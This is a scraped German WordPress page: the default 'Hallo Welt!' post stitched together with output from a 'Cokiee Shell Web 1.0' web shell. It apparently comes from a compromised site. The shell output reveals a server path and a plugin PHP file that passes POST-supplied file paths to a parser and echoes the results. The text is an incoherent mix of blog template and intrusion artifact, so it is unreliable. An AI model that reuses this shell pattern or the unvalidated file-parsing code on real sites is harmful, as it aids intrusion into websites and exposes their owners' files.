Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web284/html/wp-content/plugins/codestyling-localization/includes/ |
Current File : //var/www/web284/html/wp-content/plugins/codestyling-localization/includes/low-memory-parsing.php |
<?php //simple safety check $a = str_replace("\\", '/', dirname(__FILE__)); $b = str_replace("\\", '/', dirname($_POST['file'])); $da = implode('/',array_slice(explode('/', $a),0,-4)); $idx = strpos($b,$da); if (($idx === false) || ($idx > 0)) exit(); require_once(dirname(__FILE__).'/class.parser.php'); $parser = new csp_l10n_parser($_POST['path'], $_POST['textdomain'], true, false); $r = $parser->parseFile($_POST['file'], $_POST['type']); echo base64_encode(serialize($r)); exit(); ?>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare